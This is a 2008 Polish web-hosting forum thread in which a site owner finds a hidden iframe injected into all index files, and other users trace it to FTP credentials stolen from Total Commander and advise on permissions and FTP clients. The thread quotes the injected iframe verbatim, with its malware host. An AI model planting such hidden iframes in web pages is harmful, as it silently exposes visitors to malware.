WPNJ 0 Zgłoś post Napisano Październik 31, 2008 Witam. Mam dość dziwny problem. Posiadam forum na skrypcie phpbb3. Dzisiaj wchodząc na forum wyskoczył error, że w index.php coś się zepsuło. Wszedłem do pliku, znalazłem odpowiednią linijkę w kodzie i co widzę? <html><body><iframe src="http://MediaHouseNameBuyPicture.cn/in/" width=1 height=1 style="visibility: hidden"></iframe></body></html> Co najgorsze ten sam kod był w każdym pliku index.php czy index.html. Nie mam pojęcia co to jest. Jak wszedłem na tą stronę to się nic nie pojawiło, tylko Firefox się zawiesił. Może to jakiś złośliwy skrypt??? Wirus?? Skąd coś takiego mogło się wziąć we wszystkich plikach index??? Może ma ktoś jakieś pomysły co do tego. Udostępnij ten post Link to postu Udostępnij na innych stronach
patryk 451 Zgłoś post Napisano Październik 31, 2008 Jeśli masz jakieś skrypty uploadu na forum to sprawdź czy nie mają dziury bo zapewne ktoś Ci to zainsertował przez nią właśnie. Analiza logów też pomoże . Sam skrypt to zapewne najzwyklejsze spyware. Udostępnij ten post Link to postu Udostępnij na innych stronach
p 3 Zgłoś post Napisano Październik 31, 2008 Jak wszedłem na tą stronę to się nic nie pojawiło, tylko Firefox się zawiesił. Może to jakiś złośliwy skrypt??? Wirus??Tak. Skąd coś takiego mogło się wziąć we wszystkich plikach index??? Może ma ktoś jakieś pomysły co do tego.Pewnie z Ukrainy. Udostępnij ten post Link to postu Udostępnij na innych stronach
WPNJ 0 Zgłoś post Napisano Październik 31, 2008 Czy usunięcie tego kodu z plików "zamknęło" sprawę czy nadal coś może być nie tak. Jak się pozbyć tego raz na zawsze? patryk nie mam żadnych skryptów uploadu. Udostępnij ten post Link to postu Udostępnij na innych stronach
p 3 Zgłoś post Napisano Październik 31, 2008 Czy usunięcie tego kodu z plików "zamknęło" sprawę czy nadal coś może być nie tak.Niczego nie zamknęło. Sprawa jest nadal 'otwarta'. Jak się pozbyć tego raz na zawsze?Zabezpiecz serwer. Udostępnij ten post Link to postu Udostępnij na innych stronach
WPNJ 0 Zgłoś post Napisano Październik 31, 2008 To wina skryptu forum czy serwera??? Chyba nie mam wpływu na zabezpieczenie serwera neteasy. Udostępnij ten post Link to postu Udostępnij na innych stronach
patryk 451 Zgłoś post Napisano Październik 31, 2008 Ano tak, w dodatku jeszcze masz konto u mnie. To śpiesze wyjaśnić, że gdyby to była wina serwera to każda strona na maszynie, na której jest Twoje konto miałaby ten problem. Przejrzenie logów i sprawdzenie czy ktoś Ci czegoś nie zainsertował ne boli, naprawdę (podobnie jak napisanie do biura obslugi). ps. (po zajrzeniu na konto): na to żeby nie ustawiać drwxrwxrwx na katalogi masz z pewnością wpływ . Udostępnij ten post Link to postu Udostępnij na innych stronach
WPNJ 0 Zgłoś post Napisano Październik 31, 2008 No tak. A czego szukać w logach? Bo jak przejrzałem logi z Apache to naprawdę niczego dziwnego nie znalazłem. Udostępnij ten post Link to postu Udostępnij na innych stronach
patryk 451 Zgłoś post Napisano Październik 31, 2008 Przeczytaj moje postscriptum.. Udostępnij ten post Link to postu Udostępnij na innych stronach
WPNJ 0 Zgłoś post Napisano Październik 31, 2008 A mógłbyś jaśniej powiedzieć co to jest??? Bo naprawdę aż taki mądry w tych tematach nie jestem Udostępnij ten post Link to postu Udostępnij na innych stronach
patryk 451 Zgłoś post Napisano Październik 31, 2008 Prawa dostępu do katalogu, jeśli ustawiasz sobie na katalogi prawa "777" to nie dziw sie, że każdy może wykorzystać najmniejsza dziurę w Twoim serwisie i wrzucić jakiś skrypt na Twoje konto. Jeśli masz więcej pytań pisz do BOKu, bo nie będe tutaj listował Twojego katalogu domowego . Udostępnij ten post Link to postu Udostępnij na innych stronach
WPNJ 0 Zgłoś post Napisano Październik 31, 2008 Skorzystam z BOKu Udostępnij ten post Link to postu Udostępnij na innych stronach
exa 0 Zgłoś post Napisano Październik 31, 2008 Ostatnio czytałem o podobnych problemach i okazało się, że istnieje wirus/robak, który po instalacji w systemie windows wyszukuje zapisanych haseł na serwery FTP (np. z total commandera), loguje się i dokleja złośliwy kod do plików index. Radziłbym zmienić hasła do FTP i nie korzystać z opcji pamiętania haseł. Udostępnij ten post Link to postu Udostępnij na innych stronach
Noone 19 Zgłoś post Napisano Październik 31, 2008 To TC tak miał. Na przyszłość zadbaj o zabezpieczenie własnego komputera. I zmień klienta ftp (np. na fireftp). Udostępnij ten post Link to postu Udostępnij na innych stronach
Tomasz Fiedoruk 98 Zgłoś post Napisano Listopad 1, 2008 Tym bardziej, że ostatnio pozwali kogoś za używanie TC (TC jest na licencji shareware i należy go odinstalować po 30 dniach użytkowania) Udostępnij ten post Link to postu Udostępnij na innych stronach
Hekko.pl 239 Zgłoś post Napisano Listopad 2, 2008 Tym bardziej, że ostatnio pozwali kogoś za używanie TC (TC jest na licencji shareware i należy go odinstalować po 30 dniach użytkowania) Albo wykupić licencję no przecież to nie jest fortuna Udostępnij ten post Link to postu Udostępnij na innych stronach
xorg 693 Zgłoś post Napisano Listopad 2, 2008 Po co używać TC do FTP jak wiele lepszych programów freeware od niego, np. FileZilla Udostępnij ten post Link to postu Udostępnij na innych stronach
p 3 Zgłoś post Napisano Listopad 2, 2008 Po co używać TC do FTP jak wiele lepszych programów freeware od niego, np. FileZilla Po co używać osobnego programu? Udostępnij ten post Link to postu Udostępnij na innych stronach
WPNJ 0 Zgłoś post Napisano Listopad 4, 2008 Witam. Już wiem skąd ta cała afera. Wszystko przez Total Commandera. Miałem w nim zapisane parę danych do kont ftp. I na wszystkich jest to samo. To musiał być jakiś wirus tak jak mówił exa. Strzeżcie się. P.S. Jakiego klienta FTP używać? Udostępnij ten post Link to postu Udostępnij na innych stronach
xorg 693 Zgłoś post Napisano Listopad 4, 2008 FileZilla. Udostępnij ten post Link to postu Udostępnij na innych stronach